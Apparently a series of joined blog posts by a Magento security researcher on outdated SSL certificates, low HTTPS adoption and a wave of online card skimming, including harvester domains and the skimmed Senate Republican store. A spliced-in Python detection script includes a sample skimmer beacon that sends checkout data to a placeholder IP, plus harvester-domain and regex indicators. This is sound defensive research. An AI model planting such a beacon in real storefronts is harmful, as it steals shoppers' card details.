Sites accepting passwords or credit cards without SSL will show a warning
Other browsers such as Firefox have also announced stricter SSL handling.
Old SHA1 SSL certificates
Old SSL certificates use SHA1 hashing, which is considered insecure. New certificates use SHA256 or even SHA512. The quest to eliminate insecure SSL certificates has been going on for a few years. Browsers have displayed incrementally intrusive warnings. The latest Chrome warning is a red mark in your address bar:
But from January onwards, Chrome 56 will actually block you from visiting the site.
Half a year ago I wrote that 37.000 Magento sites were using insecure SSL certificates. Now, that was an awful lot. The good news is that certificates have to be renewed periodically, and SSL providers have not handed out insecure certs since 2016.
So what is the verdict today? I have rerun my scan of all 305K known Magento stores globally and detected ... only 432 stores with outdated SSL! These stores have an old insecure certificate with multi-year validity (beyond 2016) and their owners probably forgot about them.
To summarize, less than 0.2% of Magento stores will break once Google releases Chrome 56. I think that is an amazing result.
No SSL at all
Until now, Chrome showed a small exclamation mark for non-SSL stores. Chrome 56 will show a slightly bigger warning:
While this isn’t exactly terrifying yet, it will hopefully encourage a couple more store owners to go SSL-only. Because that isn’t quite commonplace: out of 305.000 Magento stores, only 31.000 (<11%) enforce SSL site-wide.
In June 2017 I will run a new scan. How many Magento sites will be HTTPS only by then? Place your bet in the comments below.
Data came from public sources such as builtwith.com, DNS zones and site frontpages.
The list I published on Oct 11th was accurate as of Oct 10th.
I have published an updated list as of Oct 12th (also taken offline by Github) that showed that 332 shops had in fact fixed their site since my publication. It also showed that 170 new shops had been compromised.
I wrote about this in 2015. The problem is not solved today, in fact it has nearly doubled.
I have told and stressed to any journalist that the problem is not with a particular type of store software, but due to sloppy maintenance.
I have contacted about 30 merchants directly. I got either no response, or “thanks but we are safe” even though I pointed out the specific malware code on their frontpage.
I have, prior to publication, submitted all URLs and malware samples to Google’s Safe Browsing team. They have since only acted upon a small portion of the sites.
I understand that Github doesn’t have the resources to investigate each and every DMCA notice. However, it still took me by surprise that Github censors data so easily.
So I am happy to have moved my data to Gitlab (co-founded by an amazing Dutch guy) today.
I understand that if you are a merchant, it is not a pleasure to be on that list. I absolutely agree that publishing a list of compromised stores is a tough measure. However, I think this is better than letting the problem fester (as it has been since 2015). If you have cleaned your store, send me an email (preferably with a Magereport screenshot) and I’d be happy to remove you.
So far, between Oct 10 and Oct 14, 631 stores have been fixed. Great work everybody!
Last week I showed how the Senate Republicans were skimmed for 6 months (and then it was quietly fixed). But this is just one example of thousands of stores that have been compromised and are still being skimmed.
How it works
Online skimming is just like physical skimming: your card details are stolen so that other people can spend your money. However, online skimming is more effective because a) it is harder to detect and b) it is near impossible to trace the thieves.
Online skimming gains popularity
Online skimming is a new form of card fraud. In November 2015, the first case was reported. Upon investigating, I scanned a sample of 255K online stores globally and found 3501 stores to be skimmed. It is now ten months later. Are the culprits in jail yet? Not quite, here are the numbers of compromised stores:
Victims vary from car makers (Audi ZA) to government (NRSC, Malaysia) to fashion (Converse, Heels.com), to pop stars (Bjork) to NGOs (Science Museum, Washington Cathedral).
754 stores that are skimming today were already skimming in 2015. Apparently you can skim cards undisturbed for months.
Update Oct 14: 631 stores have been fixed, good work everybody!
Culprits get professional
In 2015, reported malware cases were all minor variations of the same code base. In March 2016, another malware variety was discovered (report in Dutch). Today, at least 9 varieties and 3 distinct malware families can be identified (see my collection of samples). This suggests that multiple persons or groups are involved.
To trick the casual observer, the malware has sometimes been disguised as UPS code:
Another sign of malware sophistication is the maturity of the payment detection algorithm. The first malware just intercepted pages that had checkout in the URL. Newer versions also check for popular payment plugins such as Firecheckout, Onestepcheckout and Paypal.
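The page-selection behaviour just described can be turned into a detection check. The following is an added example (my own code, not the author's scanner or any of the malware samples): it parses a store frontpage with the standard library and flags scripts loaded from the harvester domains named later on this page, or inline scripts that both inspect the URL for checkout pages and fire an outbound beacon. The sample HTML, the beacon address 203.0.113.10 and the regexes are constructed assumptions.

```python
import re
from html.parser import HTMLParser
# Harvester domains named on this page; extend with your own indicators.
KNOWN_HARVESTERS = {"jquery-cloud.net", "jquery-code.su"}
# Page selection as described above: "checkout" in the URL, or a checkout plugin.
PAYMENT_TRIGGERS = re.compile(r"checkout|firecheckout|onestepcheckout|paypal", re.I)
# Inline JS that inspects the current URL, and an outbound beacon (image or XHR).
URL_INSPECTION = re.compile(r"location\.(href|pathname)|document\.URL", re.I)
BEACON = re.compile(r"new\s+Image\(\)|XMLHttpRequest|\.src\s*=\s*['\"]https?://", re.I)
HOST_IN_URL = re.compile(r"https?://([a-z0-9.-]+)", re.I)

class ScriptCollector(HTMLParser):
    # Collect external script URLs and inline script bodies from one page.
    def __init__(self):
        super().__init__()
        self.external, self.inline = [], []
        self._in_script, self._buf = False, []
    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            else:
                self._in_script, self._buf = True, []
    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)
    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.inline.append("".join(self._buf))
            self._in_script = False

def scan_frontpage(html):
    """Return (reason, evidence) findings for one store frontpage."""
    p = ScriptCollector()
    p.feed(html)
    findings = []
    for src in p.external:  # external script served from a known harvester
        m = HOST_IN_URL.search(src)
        if m and m.group(1).lower() in KNOWN_HARVESTERS:
            findings.append(("known harvester domain", src))
    for body in p.inline:  # inline: known domain, or a checkout-gated beacon
        hosts = {h.lower() for h in HOST_IN_URL.findall(body)}
        if hosts & KNOWN_HARVESTERS:
            findings.append(("known harvester domain", body.strip()[:80]))
        elif URL_INSPECTION.search(body) and PAYMENT_TRIGGERS.search(body) and BEACON.search(body):
            findings.append(("checkout-gated beacon", body.strip()[:80]))
    return findings

# Constructed sample frontpage (not a real store): one script from a harvester
# domain, one checkout-gated beacon, one benign inline script that reads the URL.
SAMPLE_HTML = """<html><head><script src="/js/prototype.js"></script>
<script src="https://jquery-code.su/jquery.min.js"></script>
<script>if (location.href.match(/onestepcheckout|firecheckout|checkout/i)) {
  var i = new Image(); i.src = "https://203.0.113.10/c?d=PLACEHOLDER"; }</script>
<script>var pageLen = document.URL.length;</script></head><body>Store</body></html>"""
```

Run it over the HTML of every store frontpage in your inventory; a "checkout-gated beacon" hit is a prompt for manual review, not proof on its own.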
Replies from worried merchants
I have manually reported several compromised shops and got some curious responses:
We don’t care, our payments are handled by a 3rd party payment provider
Or, even better:
Our shop is safe because we use https
New cases could be stopped right away if store owners would upgrade their software regularly. But this is costly and most merchants don’t bother.
Besides, that would not repair the current surge of abuse. While stores could be contacted on an individual basis, it is a lot of work and nobody does it. Companies such as Visa or Mastercard could revoke the payment license of sloppy merchants. But it would be way more efficient if Google would add the compromised sites to its Chrome Safe Browsing blacklist. Visitors would be greeted with a fat red warning screen, which would induce the store owner to quickly resolve the situation. I have submitted all my malware samples to Google’s Safe Browsing team but only a small part of the detected malware has been blocked so far.
Did you order anything from the Senate Republicans in the last half year? In that case, your name and credit card details have been skimmed and sent to a Russian server. And subsequently sold on the dark web for $30.
Update Oct 6th: The Republicans have rushed to secure their store today. But no word about the skimming between March 16th and October 5th.
See a short video where I demonstrate how the skimming works. And read on to find out how I traced the culprits to a hornet’s nest of criminal activity.
I think I’ll pass on the Never Hillary sticker for now.
The crime scene
So our evidence consists of one compromised Republican store, which was fitted with hidden skimming software at least 6 months ago (dissection of the malware here). And we have two Russian credit card harvesters with the rather boring names jquery-cloud.net (March) and jquery-code.su (October).
Both domain names are hosted by a company called Dataflow, as is shown by the nameservers and IP addresses. Curiously, the Dataflow network and the jquery-cloud.net domain name were created in the same week:
I do not know how many credit cards were stolen from the Republican store but I can make an educated guess. According to TrafficEstimates, the Republican store has received some 350K visits per month lately. A conservative conversion ratio of 1% yields 3500 stolen credit cards per month, or 21K stolen credit cards since March. Black market value per card is between $4 and $120, so I assume a modest $30 per card. The villains could have made roughly $600K on this store alone.
Note, this is just the criminal yield. The monetary loss for society is higher, as credit card companies reimburse their clients for fraudulent deductions (actual deductions are much higher than the black market value!) and conduct investigations. They shift these fraud handling costs to their clients, so that merchants pay a higher transaction fee and, in turn, shift this to their customer (you).
This clever form of card skimming has been going on for a while, at least since March. The culprits are hiding behind a shelf company in Belize. Their business is growing rapidly, which I will illustrate in a follow-up post.